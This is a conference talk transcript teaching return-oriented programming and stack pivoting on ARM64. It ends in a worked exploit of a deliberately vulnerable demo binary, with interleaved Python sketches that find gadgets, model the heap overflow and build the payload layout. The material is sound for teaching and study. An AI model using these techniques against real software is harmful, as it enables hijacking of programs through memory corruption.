
Introduction to Return Oriented Exploitation on ARM64

BSides Manchester · 2018 · 28:58 · 3.1K views · Published 2018-08
About this talk
A technical deep-dive into return-oriented programming (ROP) exploitation techniques on ARM and ARM64 architectures. The talk covers fundamental register layouts and calling conventions for both 32-bit and 64-bit ARM, introduces stack pivoting as a technique to execute gadget chains under memory corruption constraints, and demonstrates a complete ROP exploit against a vulnerable ARM64 binary.
Transcript [en]

All right, so today we're talking about an introduction to return-oriented exploitation on ARM64. I did actually already present this talk earlier today, but the audio didn't record, unfortunately, so I'm doing it a second time. First of all, for those of you who don't know who I am, my name is Billy Ellis. I'm a seventeen-year-old from the UK, and I've been doing programming and iOS app development for around five or six years now. In the last two years I got interested in security, specifically mobile security and software exploitation, and during that time I've created a set of various ARM exploit exercise binaries, which are basically small programs where you

can test your skills at different types of memory corruption exploitation, and those are available online. I'm also the author of Beginner's Guide to Exploitation on ARM, which is what the title says: a beginner's guide to the basic concepts of software exploitation, specifically geared towards the ARM architecture, so mobile devices. I also run a YouTube channel teaching different programming-related topics: app development, exploit development, things like that, mostly related to iOS jailbreaking. The focus of this talk is to introduce return-oriented exploitation techniques for people who are not familiar with them, and also to cover the fundamentals of both the ARM and the ARMv8, or ARM64, architectures, and then I'm

going to demo a ROP exploit at the end, to integrate some of the techniques I'm going to discuss into an example that you can see. So first of all, why would you want to target ARM? ARM devices are things like mobile devices, which are all running on ARM-based chips. Some laptops now use ARM as well, and embedded systems, smartwatches, lots of different devices are running on ARM-based chips. So obviously that makes it a hugely worthwhile target for attackers and malware developers, because these devices are becoming more and more popular, and so there's a big market for that. We're going to look first of all at the fundamentals of the ARMv7 architecture, so this is the

32-bit ARM architecture. It uses instructions of a fixed size of 32 bits, and it also supports a different mode known as Thumb mode, which is a 16-bit mode, so that's useful for memory efficiency. It also has 16 main registers that you need to know about, which in assembly are labeled from r0 to r15. So r0 to r12 are all general-purpose registers, and you can essentially use these to store any data you need for your programs. The first few of those, I think r0 up to r3, are used for passing arguments to functions, so you would pass your first argument in r0, the second in r1, and so on.

Then you also have some special-purpose registers. r13, first of all, is used as the stack pointer register, which will always hold the address that points to the top of the current stack frame. r14 is the link register, which will hold the address where code execution needs to resume after a function has returned to its caller. And finally, r15 is the program counter, which will store the address of the next instruction to be executed. On the other hand we have ARMv8. This is the 64-bit version, so it's also referred to as ARM64, and the ARMv8 chips do actually support AArch32 for backwards

compatibility. There are also some additional features in ARM64 processors, including support for exception levels, which is a way of physically separating the execution levels of code. You can compare this to something like ring 0 and ring 1, that sort of thing, but that's beyond the scope of this talk. With the registers on ARMv8, we have a different set this time. We have a lot more general-purpose ones: we have 30, and these are labeled from x0 to x29. You can also refer to these in a 32-bit context if you use a W to reference them instead. So the W name, obviously, will be the same register, but it will

be referred to as a 32-bit register instead, so it will essentially ignore the upper 32 bits. And again we have the same three special-purpose registers: the link register is x30, the stack pointer is sp (register number 31 in the encoding), and the program counter this time is its own register that's not directly modifiable by the programmer. So if you're writing some ARM64 assembly code, you cannot move a value directly into the program counter; you can only use the branch instructions. Whereas on ARMv7 you can actually use r15 as a register to manipulate just like you would any of the others. So here's a couple of illustrations to demonstrate the differences between these two

instruction sets. You can see there are differences in the register names. Both of these small functions are doing the same thing; the instruction mnemonics vary very slightly. And then the return instructions: with ARMv7 we have a branch to the link register instruction; on ARMv8 you actually have a ret, which does the same thing. There are some differences with the stack access instructions. With ARMv7 we have a push, which is the classic stack access instruction you know about, which will add items to the top of the stack, in this case the ones specified by the registers. ARMv8 is slightly different. You first of all manually shrink, or rather grow, the stack by

subtracting a value from the stack pointer, so this gives the stack some new space at the top. Then you use an stp instruction, which will store a pair of registers, in this case x29 and x30, at an address relative to the stack pointer. So it's done in two stages instead of one. The same thing goes for the opposite, removing items from the stack, and this also ties in with returning from functions. Again, with ARMv7 we just have a pop instruction, which pops values from the stack into the registers, and, as I said, you can directly access the program counter on ARMv7, so this would actually be

sufficient to return from a function. You would have your return address on the stack and you'd pop it directly into the program counter to return to where you were before. With ARMv8 this time we have three instructions. We use an ldp to load a pair of registers from the stack, in this case x29 and x30 again. Then we manually shrink the stack by adding a value to the stack pointer, so it shrinks back to its original size. And then we return with the ret, which branches to x30, which we would have just loaded with the ldp. So that's the basics of the ARM

architecture out of the way. Now I'm going to talk about the basics of ROP, or return-oriented programming. ROP stands for return-oriented programming, and it's a modern exploit technique used to execute a payload. It works on the basis of a code reuse attack. It was originally designed as an alternative to shellcode payloads, which is the old-fashioned way of writing a payload that you may know. That basically involved writing the actual byte encodings for several instructions to somewhere in memory that you control, for example on the stack or on the heap. An attacker could write their own instructions, and then they would just jump to this place in memory using their code execution bug,

and then they would be able to execute whatever instructions they wanted to. Obviously, in modern systems that's not possible anymore, but here's a diagram to illustrate how that would work. You can see we have a stack here, and assuming this is vulnerable to a classic stack buffer overflow vulnerability, you can see we write lots of shellcode, in the green there, which is the byte representation of the actual instructions. We write that down until we get to the point of the saved return address, and then we just overwrite the saved return address with an address pointing back to the start of the shellcode buffer. Then when the function that you're

currently in returns, it's going to jump to your shellcode and execute all the instructions you've prepared, so you can essentially execute arbitrary code in your target process. But as I said, it's no longer possible, because we have basic forms of data execution prevention, which essentially means that you cannot execute anything from stack and heap memory, because it's considered data. You can only execute code that's in the actual text segment of the binary, where the real instructions will be. ROP obviously provides the workaround to that, because it uses real instructions that are actually in the code segment, but it just uses them in a different order, essentially. So it's kind

of like piecing together parts of the code in your own order. You just take pieces from different functions and connect them together in an order that achieves the outcome you want, and that's how you can construct a payload with ROP. To do that you use gadgets, which are short sequences of instructions that end with a return instruction. This return instruction is the vital part that allows you to chain together several pieces of code and execute a full chained payload. Now, these gadgets are obviously found within the text segment of the actual binary, the executable segment, and they're normally found at the end of a function, because obviously they end in the return, and that's where

you'd normally find them. So this is an example of one gadget you might find on the ARM64 architecture. You can see it consists of three instructions. The first one is an str instruction, and in this case it stores the value of a register to a memory location: it stores whatever data is currently held inside x0, and it stores that wherever x1 points to. So, for example, if an attacker can already control x0 and x1 beforehand, then using this gadget they have an arbitrary write primitive, because they can patch any area of the process memory by setting up these values beforehand and then jumping into this

gadget. So that's how you might use this. The next two instructions in the gadget are not really part of the gadget; they're just the return sequence. On ARMv8 you have the two instructions to return, so again loading the pair of registers and then branching to x30. The str instruction is the only really desired instruction in this gadget. So gadgets are chained, as I mentioned, with the return instructions, and this works essentially by placing all the gadget addresses that you want to execute in chronological order on the stack, going downwards, and then every return instruction is going to get the next address from the top of the stack.
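The chaining idea described here can be modeled with a toy sketch in Python. This is only an illustration, not exploit code: the gadget functions, the addresses 0x1000 to 0x3000, and the register names used are all made up for the example, and index 0 of the list stands in for the top of the stack.

```python
# Toy model of ROP chaining. Gadget behaviour and addresses are invented
# for illustration; nothing here touches a real process.

regs = {"x0": 0, "x1": 0}
trace = []

def gadget_set_x0(stack):
    # Stands in for a gadget that loads x0 from the stack, then returns.
    regs["x0"] = stack.pop(0)
    trace.append("set_x0")

def gadget_set_x1(stack):
    # Stands in for a gadget that loads x1 from the stack, then returns.
    regs["x1"] = stack.pop(0)
    trace.append("set_x1")

def gadget_add(stack):
    # Stands in for a gadget that adds x1 to x0, then returns.
    regs["x0"] = regs["x0"] + regs["x1"]
    trace.append("add")

# Hypothetical code addresses mapped to the gadgets that "live" there.
GADGETS = {0x1000: gadget_set_x0, 0x2000: gadget_set_x1, 0x3000: gadget_add}

def run_chain(stack):
    # Every "return" takes the next address from the top of the stack
    # and continues execution there.
    while stack:
        addr = stack.pop(0)
        if addr not in GADGETS:
            break  # a real process would crash here
        GADGETS[addr](stack)

# Attacker-controlled stack contents: gadget addresses mixed with data.
chain = [0x1000, 40, 0x2000, 2, 0x3000]
run_chain(list(chain))
print(regs["x0"], trace)
```

The attacker never supplies instructions, only addresses and data; the order of the addresses on the stack decides the order in which existing code runs.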

Because that's how returning normally works with functions: the saved address to return to will be on the stack, and therefore it's going to essentially go through your whole payload, jumping into these different locations in code. This diagram represents that. Again, if we have a stack with a buffer overflow vulnerability, this time we fill it up with some junk, not the shellcode, so in the green is just some junk data. Then we get to the point of the saved return address, and this time we overwrite that with an address pointing to somewhere in the code segment. You can see where it points if you follow the gray arrow: it points

to some gadget. It doesn't matter what it is, but it points to some gadget. Then all of the other gadgets that we want to execute after that, we just place continuously going down the stack in the chain. What happens is, when the function returns, it's going to jump to your first gadget, which obviously can execute because it's in the real code segment. That gadget's going to return, which is going to follow the blue line back down and go to your next gadget, and so on. This will keep going depending on how many gadgets you've set up, and that's how you execute a full payload. So the rets are what allow you to jump to

the next gadget. To actually find gadgets, you obviously have to work with what you've got in the binary, so you need an efficient way to scan the binary. There are a lot of tools out there that will allow you to search the binary for gadgets. Essentially this works by scanning the whole binary for return instructions first of all, and then, when you find a return instruction, you just search backwards in four-byte chunks to look at the instructions that come before it. If you find an instruction before it that is useful to you in your specific case, then you can note down the address of that gadget.
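The scanning approach described above can be sketched in a few lines of Python. This is a minimal illustration under stated assumptions, not how any particular tool works: `find_gadgets`, the base address 0x1000, and the five-instruction sample buffer are invented for the example. The only fixed facts it relies on are that AArch64 instructions are four bytes long and that `ret` encodes as 0xD65F03C0.

```python
import struct

# AArch64 encoding of `ret` (return to the address in x30),
# stored little-endian in memory.
RET = struct.pack("<I", 0xD65F03C0)

def find_gadgets(code, base=0, max_insns=3):
    """Map start address -> raw bytes for each run of up to max_insns
    instructions that ends in ret."""
    gadgets = {}
    for off in range(0, len(code) - 3, 4):
        if code[off:off + 4] != RET:
            continue
        # Walk backwards from the ret in four-byte steps.
        for back in range(1, max_insns):
            start = off - 4 * back
            if start < 0:
                break
            gadgets[base + start] = code[start:off + 4]
    return gadgets

# Made-up sample "text segment":
#   nop ; str x0, [x1] ; ldp x29, x30, [sp], #16 ; ret ; nop
words = [0xD503201F, 0xF9000020, 0xA8C17BFD, 0xD65F03C0, 0xD503201F]
text = b"".join(struct.pack("<I", w) for w in words)

found = find_gadgets(text, base=0x1000)
for addr in sorted(found):
    print(hex(addr), found[addr].hex())
```

A real gadget finder would also disassemble each candidate so a person can read what it does; this sketch only collects the raw bytes and their addresses.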

And use that in your payload. There are obviously a lot of tools available online that will do this for you, so there's a couple of examples there which you may want to check out. When executing a complex ROP chain, one involving a lot of gadgets, there's often a problem that you may run into, and this is obviously a very common occurrence if you're working with a real-world exploit. For example, if you're targeting a kernel vulnerability, say in the iOS kernel or the Android kernel, often the goal would be to use that kind of vulnerability to obtain code execution and then patch out security measures, to allow you to use

a device in a different way. Now, this is not going to be done with a single gadget. You're going to need a lot of preparation and a lot of different patches being applied, and in some cases you may need several hundred gadgets to actually achieve the outcome. There is a problem with that, which will arise if you're working with modern bugs, particularly ones based around the heap. The majority of bugs found in modern systems today, at least from what I've studied and what I've seen, are heap-related bugs: for example heap overflows, or more complicated ones such as use-after-frees or double frees. These are the ones that are

most commonly found in modern systems today. Obviously every vulnerability is different, so depending on the way it occurs, you may be limited in the number of gadgets you can actually execute. This is because, if you don't have access to the stack like I just showed before, if you're not working with a stack overflow vulnerability, then you have no control over the data on the stack. So if you have your heap overflow, and you trigger your bug and jump to your first gadget, when that gadget tries to return it's going to be returning to the stack, because that's

how that's done, and you're not going to have any data on the stack that you control. So you can only execute one gadget before the program terminates. The solution to this is a technique known as stack pivoting, which allows you to basically create your own fake stack with data that you fully control. You do this by modifying the stack pointer register and making it point to a new location in memory, and this memory is populated with your ROP chain, your gadget addresses. Then you redirect code execution to your first gadget, and when it returns, instead of going to the real stack, it's going to be using your

fake stack, which is obviously data that you control, so it's going to go through your gadget chain just as normal, as if you did have full control over the real stack. I'm going to explain how this works exactly, but first of all, a bit more about the stack itself. In most computer science classes you'd be told that the stack is a last-in, first-out data structure, and you essentially treat it as a physical stack of items. You can add an item to the top by pushing it, and then you can remove an item from the top by popping it. So this is essentially like a stack of plates: you

can add one to the top and remove one from the top. Obviously this is just a theoretical model, and the actual way this works is a lot different in low-level memory. In terms of how the binary would execute, the stack is just an area of memory, and the only thing that makes it the stack is the fact that the stack pointer points to it. So, for example, this is just a block of memory here, and you can see I've got the stack pointer up there set to address 10, and that red arrow represents that. So this is currently considered the top of the stack, and it's only considered that because of the stack

pointer value. You can see the data on the stack: 414141 is the top item. If you wanted to remove this item from the stack, you would execute a pop instruction, and the way this actually executes at the low level is that your stack pointer value is incremented by four for every value you want to pop. So you increment it by four, and the stack pointer now points to somewhere higher in memory but lower down the stack, because the stack grows in the opposite way to what you may think: it grows towards the lower addresses. Therefore your stack is now one item shorter. No data is actually

changed in terms of the memory, but your pointer is pointing one item higher in memory, so this is considered the new top of the stack. You can see the data actually remains in memory, because it doesn't really matter if it's there or not; it's no longer considered part of the stack. The same thing goes for pushing, where it's the opposite: you would decrement the stack pointer to grow the stack, so up to here, and then you write your new data to this new location, and your new item has been added to the top of the stack. With this knowledge you can now see how a stack pivot would work. So let's

assume this is the whole process memory for a target program, and down here this section is reserved for the stack. You have the stack base, then everything in between is the stack, and then the stack pointer, which is the top of the stack. Now, say you have some other block of memory somewhere else which you control, if you're working with a heap-related bug. Let's say we have heap memory here with our fake ROP stack in it, so we fully control this memory, and we lay it out with gadget addresses. All we need to do to achieve the stack pivot is to somehow move the stack pointer so it

points to the start of this heap memory. When it points here, the program's not going to know any different; it just treats the stack as whatever this pointer points to, and therefore this whole block is essentially going to be treated as a stack. What that means is that when you then go to execute your gadgets and they return, they're going to be returning to gadget addresses that have been placed in your controlled memory, as opposed to what was on the real stack, and that's how you get your fake stack working. So how would you actually do this in practice? Well, you would use a special type of ROP gadget known as a pivot gadget, whose

sole purpose is to set the stack pointer to something that you have some control over. Here's an example of one: again a simple gadget, consisting of four instructions. The first instruction this time is a move instruction, which will move the value of x5 into the stack pointer. Assuming that the attacker already has their controlled address held in x5, this gadget would be perfect, because they can move that into the stack pointer, and now the stack pointer points to their controlled memory. Again, the last two instructions are not really part of the gadget; they're just for the returning part. So using those couple of techniques I've discussed, I'm going to

show you an example attack on a demo program I built for this talk. The target's name is BSides demo. This is a small, simple, artificial binary for the purpose of testing this out. There's an ARMv7 and an ARMv8 version, and I'm going to upload both of them somewhere after this talk if you want to try this out yourself. In the description there you can see it says it's a small binary vulnerable to a heap buffer overflow, so obviously we're working with the heap again, so we are going to need a stack pivot, and it allows a function pointer to be overwritten. We're going to take a look at this binary. Well, first of all, the aim

for the exploit: we're going to attempt to call the secret function. The secret function is a function inside this binary that is never called in the normal execution flow, so it's a hidden, unused function. We're going to call that function and pass a code as its first parameter, and we're going to get a success message saying that we successfully exploited the binary. Here's a screenshot of what the binary looks like when you execute it. You can see it gives you a BSides banner at the top, and then it asks you to enter the path to a file containing some data.

And you enter that wherever you want there, so file.txt. It's going to read in all the data from the file, then just print out that the data is valid, and then that's all, it will quit. By now you've probably already guessed that the only place the heap overflow can occur is when it actually reads the data from the file, which is right. This is a snippet taken from Hopper Disassembler, some pseudocode of the actual vulnerable part. You can see this call to fread: this is reading in 512 bytes from whatever file the user specifies, and it's storing it into a 64-byte char array. So this is a blatant buffer

overflow: the array cannot store that much data, so it's going to overflow into adjacent memory. Conveniently for us, there is a function pointer directly next to this buffer, so any extra data beyond the 64 bytes is going to be written directly over this function pointer, which, again conveniently, is called directly after the call to fread. It's a very artificial case, because obviously a real-world vulnerability would not be as simplistic as this, but it serves well for the demo. And that is the offset into this structure, which will actually be on the heap: the function pointer is 64 bytes along, right after that buffer.
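The overflow described here can be modeled in Python with a byte array standing in for the heap. This is a rough sketch, not the demo binary's code: the 64-byte buffer and the 512-byte read size come from the talk, while the function names, the 8-byte pointer width, the 1024-byte region, and both addresses are assumptions made for illustration.

```python
import struct

BUF_SIZE = 64         # size of the char array, from the talk
READ_SIZE = 512       # number of bytes fread is asked for, from the talk
FP_OFFSET = BUF_SIZE  # the function pointer sits directly after the buffer

def make_chunk(handler_addr):
    # 64-byte buffer, then an 8-byte function pointer (assumed 64-bit),
    # then slack standing in for whatever else is adjacent on the heap.
    chunk = bytearray(1024)
    struct.pack_into("<Q", chunk, FP_OFFSET, handler_addr)
    return chunk

def vulnerable_read(chunk, file_bytes):
    # Mirrors the bug: the copy is limited to 512 bytes, not to the
    # 64 bytes the buffer can actually hold.
    n = min(len(file_bytes), READ_SIZE)
    chunk[0:n] = file_bytes[:n]

def function_pointer(chunk):
    return struct.unpack_from("<Q", chunk, FP_OFFSET)[0]

LEGIT_HANDLER = 0x100000F00        # hypothetical address
ATTACKER_ADDR = 0x4141414142424242  # hypothetical address

chunk = make_chunk(LEGIT_HANDLER)
vulnerable_read(chunk, b"A" * BUF_SIZE)  # exactly fills the buffer
pointer_after_safe_read = function_pointer(chunk)

vulnerable_read(chunk, b"A" * BUF_SIZE + struct.pack("<Q", ATTACKER_ADDR))
print(hex(pointer_after_safe_read), hex(function_pointer(chunk)))
```

Input of 64 bytes or less leaves the pointer alone; the ninth group of eight bytes in the file lands exactly on it.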

And it will call that function pointer. So, the secret function: this is the one I said is hidden. It's not used in the real program, but essentially it's a function that will take in a code as its first parameter and compare it. The code in this case is 0x414F, and it's going to compare that code to your first argument, w0. If the code is correct, then it's going to jump you to this section here, which will give you a success message, and you've completed the exploit challenge. If the code is incorrect, or if you don't put in a code at all, or

supply a code, it's going to jump you here, which will just give you an error message. You may be thinking, why would you not just jump directly to this place, because that would obviously bypass the check and you'd get the success message right away. But that'd be too easy, and for demonstration purposes we're going to assume that we have to call secret from its entry point, just so we actually do have to work with a real ROP chain that consists of a few more gadgets. Otherwise it would literally be as simple as replacing the function pointer with the address of that part of secret. So the

exploit plan is going to be, obviously, to gain code execution, which we already know how to do with the blatant overflow into the function pointer. Then we're going to use that to run the ROP chain, which is first of all going to set up x0, or w0, to make sure it holds the secret code, and then it's going to just jump to the secret entry point, which should then validate that code and give us the success message. So what do we know already? Well, we can obviously control the program counter, or the execution flow, by overwriting that pointer, and since we're working with the heap, we can execute a single gadget

worth of execution. So we're going to need a stack pivot, so we can execute several more gadgets after that. The criteria for the stack pivot: again, it must be a single gadget, because that's all we get to work with, and it must allow us to point the stack pointer to the very start of the heap buffer, because this is where the data from the file is going to go, so obviously we control this memory, and that's what we want as our fake stack. This gadget is actually within the binary. The one I just gave as an example is the stack pivot gadget, so it moves, again, x5 into the stack pointer, and conveniently for us,

again, I programmed this example app in such a way that x5 will happen to hold the address of our heap chunk anyway. Again, very artificial, because it wouldn't be as easy as this to find a stack pivot in a real situation, but it serves well for this demonstration. So we've got the stack pivot sorted out. Now for loading x0, or w0. Here are two gadgets we're going to use to do this. You could theoretically do this with one gadget, but I wanted to replicate the more real-world idea of ROP, because when working with ROP you obviously have to work with what you've got in

your target binary; you cannot create instructions. So often it will be the case that you find a gadget that sort of does what you need it to do, but there may be side effects, or it may not be straightforward. In this case we want to control x0, but we have to do it in two stages. This first gadget lets us control x3 and x4 by loading a pair of registers. It loads them from the stack, so if we have controlled data on the stack, which we already know we can do, we can control both of these registers. The next gadget will then allow us to move

x4, which we just controlled, into x0, so we kind of have to take two steps to do this, and at that point we will have full control over x0. So that's how we're going to load x0 with the code. Finally, to call secret with it, you just need the address of the secret function, which you can find by disassembling the binary, so we've also got that done. I've actually built an exploit file before I came here. This file successfully exploits the binary and carries out the ROP attack I've just explained, and I'm going to briefly dissect what each part of this does,

again, just to make it clear how this payload works. This is just the hex dump of the exploit payload file. All of this data is less than 512 bytes, so all of it is going to be written to the heap. The first 64 bytes of it, up until this point here, are going to fill up the 64-byte char array that we had on the heap, and that means that any data after that is what overwrites the function pointer. The first thing we have after that is this, which is the address of the first gadget. So essentially we fill up the buffer and we overwrite the

function pointer with the address of our first gadget, which is our pivot gadget, you can see there. Therefore, when the function pointer is called, it's going to do the stack pivot straight away. This will move x5 into the stack pointer, and once that's done, the stack pointer points to the top of this file's data, since all the data in this file will be on the heap. So when the stack pivot is done, the stack pointer is going to be pointing to the top of this, and therefore this is our new stack. Then obviously it returns by loading a pair of registers: it loads x29 and x30, and then it branches to x30.
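A minimal Python sketch of the file layout being dissected here, followed by a tiny emulator that walks it the way the three gadgets would. Everything specific in it is an assumption: the four addresses are placeholders (the real ones come from disassembling the binary), the gadget bodies in the comments are a guess at the simplest form consistent with the talk (each one ending by loading x29 and x30 from the stack, advancing sp by 16, and returning), and the code value is 0x414F as heard in the recording.

```python
import struct

# Hypothetical addresses; the real ones come from disassembling the binary.
PIVOT   = 0x100000E00  # assumed: mov sp, x5 ; ldp x29, x30, [sp], #16 ; ret
LOAD_X4 = 0x100000E20  # assumed: ldp x3, x4, [sp], #16 ; ldp x29, x30, [sp], #16 ; ret
MOV_X0  = 0x100000E40  # assumed: mov x0, x4 ; ldp x29, x30, [sp], #16 ; ret
SECRET  = 0x100000D00  # entry point of secret()
CODE    = 0x414F       # secret code as heard in the talk
JUNK    = 0x4141414141414141

def q(value):
    return struct.pack("<Q", value)  # 64-bit little-endian

def build_payload():
    fake_stack = b"".join([
        q(JUNK), q(LOAD_X4),  # x29, x30 loaded by the pivot gadget
        q(JUNK), q(CODE),     # x3, x4 loaded by the second gadget
        q(JUNK), q(MOV_X0),   # x29, x30 loaded by the second gadget
        q(JUNK), q(SECRET),   # x29, x30 loaded by the third gadget
    ])
    assert len(fake_stack) == 64  # exactly fills the 64-byte buffer
    return fake_stack + q(PIVOT)  # bytes 64..71 overwrite the function pointer

def run(payload, heap_addr=0x200000000):
    """Emulate only the three assumed gadgets over the payload bytes."""
    mem = bytes(payload)
    regs = {"x0": 0, "x3": 0, "x4": 0, "x5": heap_addr,
            "x29": 0, "x30": 0, "sp": 0x7FFF0000}

    def pop():
        # Popping is a read at sp followed by moving sp up by 8.
        value = struct.unpack_from("<Q", mem, regs["sp"] - heap_addr)[0]
        regs["sp"] += 8
        return value

    pc = struct.unpack_from("<Q", mem, 64)[0]  # overwritten function pointer
    visited = []
    while pc != SECRET:
        visited.append(pc)
        if pc == PIVOT:
            regs["sp"] = regs["x5"]            # the stack pivot itself
        elif pc == LOAD_X4:
            regs["x3"] = pop()
            regs["x4"] = pop()
        elif pc == MOV_X0:
            regs["x0"] = regs["x4"]
        else:
            raise ValueError("unknown gadget address")
        regs["x29"] = pop()                    # shared return sequence
        regs["x30"] = pop()
        pc = regs["x30"]
    return regs, visited

payload = build_payload()
regs, visited = run(payload)
print(hex(regs["x0"]), [hex(a) for a in visited])
```

In this layout the fake stack and the overflow filler are the same 64 bytes, which is why pivoting to the start of the heap buffer is enough. Writing `payload` to a file would give something shaped like the hex dump on the slide, though with placeholder addresses it would not work against the real binary.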

So on the top of the stack, what we have is some junk data that's going to be loaded into x29, because we don't care about that register. Then we have the address that will go into x30, which we then jump to afterwards, and this is going to be the address of the second gadget. This is the first stage in controlling x0. You can see this is the one that loads x3 and x4, again from addresses relative to the stack. So we load some random data into x3, because I don't care about that one, and then we load the secret code into x4, which is the 0x414F, and this is

all in little-endian; that's why the bytes are in reverse order, if you're wondering. Then we return from this gadget, so again we load some junk into x29, and then we load the next address we want to go to into x30. This points to the third gadget, which will move x4 to x0 and then return again, so we have junk in x29, and finally the last thing we need to do is just jump to the secret entry point, which is what that address is there. That will jump straight into secret, and if everything has been set up correctly, then at that point we should already have the controlled code inside x0, and so secret should

validate that and give us the success message. So here we can specify that exploit payload file, and when we run this and enter that into the program, instead of it just reading in the data and saying it's valid, this time it takes full control, executes the ROP chain, and then we have this success message saying that we managed to successfully crack the binary, and it executes a uname -a command. So that is the exploit complete: just a quick demonstration of the ROP technique and the stack pivot technique. If you want to learn more about ARM specifically, or any other memory corruption exploitation, then there's a few useful links here. The top

one is especially good for learning about assembly programming on the ARM architectures. There's a few other ones that you can check out, and the second from bottom one is where you can download the exploit challenges that I've made for ARM-based devices, if you want to try out some of those yourself. And yeah, that's my Twitter handle if you want to tweet me or follow any of my work. That's basically it, so if anyone has any questions I'm happy to answer; if not, then you can tweet me afterwards or come up to me. Yeah. Yeah, so there are actually some mitigations against ROP. I have not personally looked into

them very much, so I can't really answer that question in too much detail. But even with those mitigations, there's actually another form of ROP known as JOP, or jump-oriented programming, which uses a similar approach, obviously reusing code, but it uses a dispatcher gadget, and instead of using gadgets that end in a return instruction, it uses gadgets that end with branches to other registers. So it's a lot harder to mitigate that. But yeah, there are mitigations against ROP. I've not seen very effective uses of them in major systems, so I'm not really sure too much about them. But yeah, thank you. Any other questions?

yeah